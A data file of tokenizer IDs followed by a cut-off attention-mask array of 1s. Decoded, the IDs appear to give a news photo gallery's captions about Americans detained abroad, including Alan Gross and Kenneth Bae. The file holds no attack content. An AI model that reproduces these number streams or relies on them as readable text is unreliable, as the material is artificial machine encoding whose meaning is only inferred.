29871, 29906, 29900, 13, 13, 4819, 15788, 29901, 23035, 1439, 7114, 28177, 29906, 29900, 20612, 13, 13, 9816, 16708, 1439, 7114, 28177, 785, 17102, 402, 2124, 29892, 472, 1492, 411, 16155, 5365, 11498, 21129, 631, 29892, 756, 1063, 297, 28618, 273, 25387, 1486, 1951, 5846, 29871, 29906, 29900, 29900, 29929, 29892, 746, 540, 471, 12337, 2356, 1550, 1985, 408, 263, 1014, 1285, 28891, 29889, 28618, 273, 21142, 1827, 402, 2124, 1898, 304, 731, 701, 27302, 4685, 12368, 373, 278, 11359, 29889, 402, 2124, 4083, 540, 471, 925, 1811, 304, 1371, 4511, 278, 16728, 7881, 304, 278, 4685, 29889, 3812, 261, 7178, 20636, 22264, 322, 1570, 12568, 402, 586, 29889, 6682, 6123, 1100, 505, 1716, 1020, 345, 839, 304, 23653, 373, 402, 2124, 29915, 2306, 3131, 29892, 541, 896, 892, 9368, 304, 11592, 670, 6507, 29889, 13, 13, 29950, 680, 9243, 683, 13, 13, 29945, 310, 29871, 29906, 29900, 13, 13, 4819, 15788, 29901, 23035, 1439, 7114, 28177, 29906, 29900, 20612, 13, 13, 9816, 16708, 1439, 7114, 28177, 785, 910, 563, 630, 1967, 4944, 491, 278, 501, 29889, 29903, 29889, 8811, 3697, 317, 4141, 29889, 350, 4657, 9827, 29881, 4494, 29892, 1058, 750, 1063, 4934, 491, 1663, 2007, 1237, 297, 27135, 9777, 1951, 29871, 29906, 29900, 29900, 29929, 29889, 450, 8037, 5619, 9326, 9827, 29881, 4494, 29915, 29879, 6507, 373, 2610, 29871, 29941, 29896, 29889, 9827, 29881, 4494, 471, 5492, 297, 14523, 363, 5320, 16336, 10288, 747, 273, 5144, 4934, 491, 278, 501, 29889, 29903, 29889, 9121, 29889, 13, 13, 29950, 680, 9243, 683, 13, 13, 29953, 310, 29871, 29906, 29900, 13, 13, 4819, 15788, 29901, 23035, 1439, 7114, 28177, 29906, 29900, 20612, 13, 13, 9816, 16708, 1439, 7114, 28177, 785, 530, 14883, 713, 8973, 18318, 714, 263, 29871, 29906, 29900, 29896, 29896, 4892, 10541, 363, 1913, 381, 940, 8848, 2219, 29892, 263, 4642, 501, 29889, 29903, 29889, 15929, 20139, 411, 805, 5414, 29889, 1205, 540, 471, 7035, 368, 3240, 1255, 297, 14883, 322, 7602, 18186, 310, 376, 29886, 1461, 936, 24771, 411, 278, 501, 29889, 29903, 29889, 5874, 1699, 670, 9883, 5429, 29696, 373, 3786, 29871, 29896, 29896, 29889, 940, 756, 1063, 2665, 9223, 304, 29871, 29896, 29900, 2440, 297, 8475, 29892, 1183, 1497, 29889, 940, 8848, 2219, 471, 1439, 7114, 297, 3111, 29871, 29906, 29900, 29896, 29896, 2645, 263, 6493, 304, 1074, 670, 4595, 29885, 1228, 29889, 3600, 3942, 322, 278, 4250, 3304, 17517, 972, 29891, 26142, 800, 540, 471, 805, 5414, 363, 278, 315, 10764, 29889, 13, 13, 29950, 680, 9243, 683, 13, 13, 29955, 310, 29871, 29906, 29900, 13, 13, 4819, 15788, 29901, 23035, 1439, 7114, 28177, 29906, 29900, 20612, 13, 13, 9816, 16708, 1439, 7114, 28177, 785, 4649, 2859, 383, 12809, 10823, 4755, 951, 3845, 1100, 5349, 1063, 4567, 1951, 29871, 29906, 29900, 29900, 29955, 29889, 3600, 3942, 4083, 540, 471, 1985, 408, 263, 2024, 7405, 1061, 297, 14883, 746, 540, 24273, 29892, 322, 2999, 13676, 4368, 951, 3845, 1100, 1122, 505, 1063, 1985, 363, 278, 315, 10764, 29889, 3600, 3942, 5429, 29696, 297, 5490, 393, 896, 505, 1472, 2998, 393, 951, 3845, 1100, 3796, 363, 278, 315, 10764, 29892, 322, 896, 1497, 372, 29915, 29879, 931, 363, 278, 5874, 304, 6568, 714, 278, 17099, 1048, 951, 3845, 1100, 29915, 29879, 1206, 29889, 501, 29889, 29903, 29889, 24921, 505, 5718, 2705, 17935, 970, 368, 393, 951, 3845, 1100, 471, 1985, 363, 278, 5874, 29892, 541, 896, 505, 28424, 1663, 12652, 393, 9138, 1075, 322, 20794, 1075, 3271, 338, 263, 376, 3332, 29908, 20136, 29889, 13, 13, 29950, 680, 9243, 683, 13, 13, 29947, 310, 29871, 29906, 29900, 13, 13, 4819, 15788, 29901, 23035, 1439, 7114, 28177, 29906, 29900, 20612, 13, 13, 9816, 16708, 1439, 7114, 28177, 785, 24511, 26331, 5465, 29892, 263, 8078, 272, 4934, 491, 394, 660, 29874, 8710, 5549, 1934, 29892, 338, 263, 501, 29889, 29903, 29889, 14497, 264, 1058, 756, 1063, 4934, 3495, 482, 297, 21215, 1951, 3111, 29871, 29906, 29900, 29896, 29896, 29889, 13, 13, 29950, 680, 9243, 683, 13, 13, 29929, 310, 29871, 29906, 29900, 13, 13, 4819, 15788, 29901, 23035, 1439, 7114, 28177, 29906, 29900, 20612, 13, 13, 9816, 16708, 1439, 7114, 28177, 785, 501, 29889, 29903, 29889, 6282, 391, 322, 22467, 3362, 25808, 273, 341, 3127, 453, 1570, 1171, 6974, 267, 472, 278, 1522, 823, 292, 4799, 637, 373, 5846, 29871, 29955, 29892, 29871, 29906, 29900, 29896, 29941, 29892, 1156, 1641, 5492, 491, 4644, 19109, 29889, 1570, 1171, 471, 1439, 7114, 297, 5533, 29871, 29906, 29900, 29896, 29941, 491, 4644, 22467, 21142, 925, 6233, 1434, 540, 471, 304, 5840, 278, 4234, 1156, 6493, 292, 1549, 385, 19098, 6282, 29889, 3600, 1487, 12208, 1570, 1171, 1497, 278, 3793, 29877, 838, 517, 29892, 8046, 29892, 767, 750, 599, 278, 1571, 5650, 1287, 322, 731, 701, 670, 17487, 1549, 263, 4644, 22467, 29899, 9961, 1490, 9850, 946, 3819, 29889, 13, 13, 29950, 680, 9243, 683, 13, 13, 29896, 29900, 310, 29871, 29906, 29900, 13, 13, 4819, 15788, 29901, 23035, 1439, 7114, 28177, 29906, 29900, 20612, 13, 13, 9816, 16708, 1439, 7114, 28177, 785, 24777, 21142, 24383, 23094, 3055, 341, 2741, 265, 912, 29892, 263, 501, 29889, 29903, 29889, 14497, 264, 29892, 1492, 29892, 297, 2610, 29871, 29906, 29900, 29896, 29941, 29892, 363, 16831, 287, 15721, 17715, 29889, 2296, 322, 902, 10216, 29892, 23529, 29892, 892, 9850, 292, 515, 12568, 1250, 304, 278, 3303, 3900, 746, 1009, 3593, 471, 11084, 322, 17371, 29889, 2296, 471, 5492, 263, 2846, 3841, 2678, 322, 338, 1286, 1250, 297, 278, 3303, 3900, 29889, 13, 13, 29950, 680, 9243, 683, 13, 13, 29896, 29896, 310, 29871, 29906, 29900, 13, 13, 4819, 15788, 29901, 23035, 1439, 7114, 28177, 29906, 29900, 20612, 13, 13, 9816, 16708, 1439, 7114, 28177, 785, 317, 3660, 287, 1976, 287, 2172, 29892, 263, 29871, 29941, 29941, 29899, 6360, 29899, 1025, 501, 29889, 29903, 29889, 14497, 264, 310, 14883, 713, 12060, 29892, 471, 2665, 9223, 304, 9475, 2440, 297, 8475, 297, 5490, 29871, 29906, 29900, 29896, 29941, 29889, 940, 471, 28886, 310, 15661, 304, 563, 837, 457, 278, 14883, 713, 5874, 322, 1095, 574, 3241, 4797, 6993, 491, 10127, 292, 3271, 26014, 29889, 13, 13, 29950, 680, 9243, 683, 13, 13, 29896, 29906, 310, 29871, 29906, 29900, 13, 13, 4819, 15788, 29901, 23035, 1439, 7114, 28177, 29906, 29900, 20612, 13, 13, 9816, 16708, 1439, 7114, 28177, 785, 4644, 19109, 756, 24383, 23035, 1434, 29892, 871, 304, 6507, 963, 1156, 263, 6493, 491, 263, 19555, 18085, 277, 653, 29889, 8237, 2879, 21671, 365, 292, 29892, 4818, 29892, 322, 382, 4347, 9371, 29892, 304, 902, 1492, 29892, 10398, 29871, 29896, 29946, 29900, 3841, 297, 4332, 2068, 1156, 1641, 20139, 411, 27302, 6251, 304, 7512, 263, 1560, 799, 11531, 29889, 2688, 892, 3005, 287, 297, 29871, 29906, 29900, 29900, 29929, 1156, 263, 17487, 491, 4642, 7178, 6682, 2233, 16929, 29889, 13, 13, 29950, 680, 9243, 683, 13, 13, 29896, 29941, 310, 29871, 29906, 29900, 13, 13, 4819, 15788, 29901, 23035, 1439, 7114, 28177, 29906, 29900, 20612, 13, 13, 9816, 16708, 1439, 7114, 28177, 785, 3812, 261, 7178, 20636, 22264, 27214, 630, 278, 6507, 310, 319, 823, 284, 265, 402, 290, 267, 29892, 1058, 471, 1439, 7114, 297, 29871, 29906, 29900, 29896, 29900, 1156, 24067, 964, 4644, 19109, 980, 1397, 635, 515, 7551, 29889, 11597, 858, 29879, 1827, 1880, 29899, 5563, 1998, 1169, 2367, 10772, 549, 29891, 574, 263, 13089, 5863, 14505, 322, 263, 982, 304, 4078, 3700, 746, 372, 27474, 263, 27314, 29889, 13, 13, 29950, 680, 9243, 683, 13, 13, 29896, 29946, 310, 29871, 29906, 29900, 13, 13, 4819, 15788, 29901, 23035, 1439, 7114, 28177, 29906, 29900, 20612, 13, 13, 9816, 16708, 1439, 7114, 28177, 785, 20861, 347, 612, 549, 2166, 8378, 471, 5492, 491, 4644, 19109, 263, 4098, 1156, 540, 471, 1439, 7114, 297, 3786, 29871, 29906, 29900, 29896, 29896, 29889, 3600, 16831, 287, 17268, 471, 451, 4944, 304, 278, 5745, 29889, 450, 3082, 16000, 362, 393, 26130, 670, 16082, 5134, 4755, 4088, 29892, 278, 501, 29889, 29903, 29889, 4266, 427, 18644, 363, 4644, 22467, 5199, 10462, 5626, 29889, 13, 13, 29950, 680, 9243, 683, 13, 13, 29896, 29945, 310, 29871, 29906, 29900, 13, 13, 4819, 15788, 29901, 23035, 1439, 7114, 28177, 29906, 29900, 20612, 13, 13, 9816, 16708, 1439, 7114, 28177, 785, 4755, 4815, 471, 5492, 491, 4644, 19109, 297, 29871, 29906, 29900, 29896, 29900, 1728, 738, 20295, 501, 29889, 29903, 29889, 1006, 7316, 29889, 450, 6111, 10655, 653, 21692, 964, 4644, 19109, 515, 7551, 29892, 19436, 263, 5497, 6721, 12931, 435, 549, 1720, 304, 3889, 8604, 22979, 322, 620, 647, 29889, 4644, 19109, 29915, 29879, 2106, 29899, 3389, 9763, 946, 3819, 1497, 4815, 471, 5492, 1156, 385, 376, 328, 6737, 322, 269, 3742, 406, 1634, 296, 749, 310, 670, 2743, 1867, 886, 1213, 2266, 29892, 4815, 8640, 263, 15373, 310, 12931, 322, 263, 4439, 29876, 473, 3276, 2278, 2645, 263, 10021, 297, 922, 5059, 29889, 13, 13, 29950, 680, 9243, 683, 13, 13, 29896, 29953, 310, 29871, 29906, 29900, 13, 13, 4819, 15788, 29901, 23035, 1439, 7114, 28177, 29906, 29900, 20612, 13, 13, 9816, 16708, 1439, 7114, 28177, 785, 22838, 383, 1131, 284, 29892, 4818, 29892, 19235, 1383, 14069, 29892, 2175, 29892, 322, 1383, 1662, 350, 7547, 892, 1439, 7114, 491, 14883, 1550, 298, 638, 292, 2978, 278, 21375, 29939, 29899, 29902, 661, 5139, 297, 5468, 29871, 29906, 29900, 29900, 29929, 29889, 14883, 20139, 963, 411, 27302, 6251, 322, 5152, 291, 482, 29889, 1383, 14069, 471, 5492, 373, 289, 737, 363, 16083, 9590, 297, 3839, 29871, 29906, 29900, 29896, 29900, 29936, 1183, 2360, 4133, 304, 3700, 902, 21090, 29889, 350, 7547, 322, 383, 1131, 284, 892, 7602, 18186, 297, 3111, 29871, 29906, 29900, 29896, 29896, 29892, 541, 278, 2446, 4098, 896, 892, 5492, 373, 289, 737, 322, 750, 1009, 25260, 844, 3860, 29889, 13, 13, 29950, 680, 9243, 683, 13, 13, 29896, 29955, 310, 29871, 29906, 29900, 13, 13, 4819, 15788, 29901, 23035, 1439, 7114, 28177, 29906, 29900, 20612, 13, 13, 9816, 16708, 1439, 7114, 28177, 785, 379, 744, 29882, 3423, 29888, 392, 29875, 1306, 29892, 385, 14883, 713, 29899, 14689, 21344, 29892, 471, 1439, 7114, 472, 14883, 29915, 29879, 382, 3845, 1588, 2285, 29892, 805, 2548, 7378, 297, 26373, 653, 1970, 262, 882, 1434, 14883, 5492, 902, 373, 289, 737, 297, 3111, 29871, 29906, 29900, 29900, 29955, 29889, 3423, 29888, 392, 29875, 1306, 471, 6493, 292, 902, 263, 6504, 5637, 297, 1920, 29882, 661, 746, 1183, 471, 24383, 322, 20139, 411, 10311, 292, 14883, 29915, 29879, 4797, 6993, 29889, 13, 13, 29950, 680, 9243, 683, 13, 13, 29896, 29947, 310, 29871, 29906, 29900, 13, 13, 4819, 15788, 29901, 23035, 1439, 7114, 28177, 29906, 29900, 20612, 13, 13, 9816, 16708, 1439, 7114, 28177, 785, 18372, 9404, 23035, 892, 4249, 278, 437, 29920, 575, 24383, 297, 5846, 29871, 29906, 29900, 29896, 29896, 746, 12892, 1153, 2618, 278, 25222, 310, 29871, 29896, 29900, 302, 549, 6170, 358, 284, 25700, 393, 372, 1497, 4520, 27302, 9117, 11782, 3277, 322, 892, 13598, 1728, 263, 970, 19405, 29889, 9267, 310, 278, 22873, 8059, 289, 737, 322, 2175, 278, 4234, 1156, 263, 9850, 9892, 471, 26239, 263, 2846, 7378, 2678, 29889, 4755, 1522, 4937, 29892, 1492, 29892, 12784, 304, 7952, 322, 2317, 14260, 29889, 13, 13, 29950, 680, 9243, 683, 13, 13, 29896, 29929, 310, 29871, 29906, 29900, 13, 13, 4819, 15788, 29901, 23035, 1439, 7114, 28177, 29906, 29900, 20612, 13, 13, 9816, 16708, 1439, 7114, 28177, 785, 2514, 4317, 5790, 7870, 20336, 323, 945, 5693, 294, 24383, 297, 20931, 297, 3786, 29871, 29906, 29900, 29896, 29941, 373, 16831, 800, 310, 5220, 292, 23995, 1237, 310, 15141, 11467, 7178, 22456, 4104, 2192, 29892, 29433, 304, 278, 5683, 20650, 678, 1351, 29920, 29889, 323, 10068, 3512, 304, 20931, 304, 1207, 263, 1842, 653, 1048, 278, 8604, 8542, 330, 374, 3262, 278, 4234, 29889, 940, 471, 5492, 297, 5306, 29871, 29906, 29900, 29896, 29941, 29889, 13, 13, 797, 670, 29360, 29892, 28576, 350, 3660, 4433, 278, 501, 29889, 29903, 29889, 5874, 29892, 278, 5745, 322, 670, 3942, 304, 451, 1207, 2712, 15029, 491, 9677, 292, 376, 29894, 488, 16558, 943, 29908, 1048, 4644, 19109, 29889, 13, 13, 3868, 884, 4433, 670, 3942, 322, 916, 1462, 272, 2153, 304, 1207, 901, 6136, 14231, 304, 11592, 670, 16082, 29889, 13, 13, 29908, 4806, 29915, 276, 17231, 393, 591, 29915, 276, 2805, 17649, 304, 278, 1095, 1699, 350, 3660, 29915, 29879, 9883, 29892, 5061, 374, 678, 686, 29892, 5429, 29696, 29889, 376, 29902, 29915, 29885, 10932, 393, 540, 750, 263, 7481, 304, 7726, 29892, 541, 372, 338, 884, 5685, 6797, 1250, 411, 263, 3287, 310, 12849, 23023, 1080, 29892, 21217, 1075, 297, 393, 8475, 9090, 1213, 13, 13, 1576, 3942, 338, 885, 1965, 363, 1075, 29892, 678, 686, 1497, 29892, 322, 338, 5929, 12818, 304, 5019, 1058, 1122, 1371, 350, 3660, 29915, 29879, 4556, 29889, 13, 13, 29908, 4806, 4658, 393, 28576, 338, 1641, 14914, 1532, 29892, 408, 540, 1497, 29892, 322, 591, 4966, 393, 4644, 22467, 21142, 674, 505, 2778, 1270, 322, 2758, 28576, 304, 2041, 3271, 1699, 1183, 1497, 29889, 13, 13, 1576, 501, 29889, 29903, 29889, 5874, 338, 2599, 825, 372, 508, 29892, 678, 686, 1497, 29892, 4417, 393, 1183, 22405, 393, 376, 386, 886, 526, 297, 278, 1736, 1213, 13, 13, 29933, 3660, 29892, 310, 18989, 6115, 29892, 7660, 29892, 471, 24383, 297, 3979, 29871, 29906, 29900, 29896, 29906, 297, 390, 1658, 29892, 3412, 4644, 19109, 29915, 29879, 302, 441, 354, 11530, 12180, 29889, 450, 2906, 449, 6111, 322, 4783, 310, 2211, 19623, 263, 7551, 29899, 6707, 5001, 4266, 5281, 297, 260, 2470, 310, 4644, 19109, 29892, 5034, 304, 670, 3942, 322, 3889, 1717, 3707, 29889, 510, 29892, 263, 4700, 393, 7875, 731, 701, 304, 27391, 670, 6507, 29889, 13, 13, 29908, 3868, 3430, 1407, 1320, 1253, 287, 1699, 350, 3660, 29915, 29879, 5637, 1497, 29889, 376, 3868, 756, 263, 4549, 29892, 4549, 3458, 29892, 541, 29892, 306, 1016, 29915, 29873, 1073, 29892, 1156, 29871, 29896, 29945, 7378, 29892, 540, 756, 304, 7344, 278, 1021, 13714, 3458, 599, 278, 931, 29889, 306, 29915, 29885, 2924, 310, 6365, 1255, 1048, 393, 1213 ]
[ 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 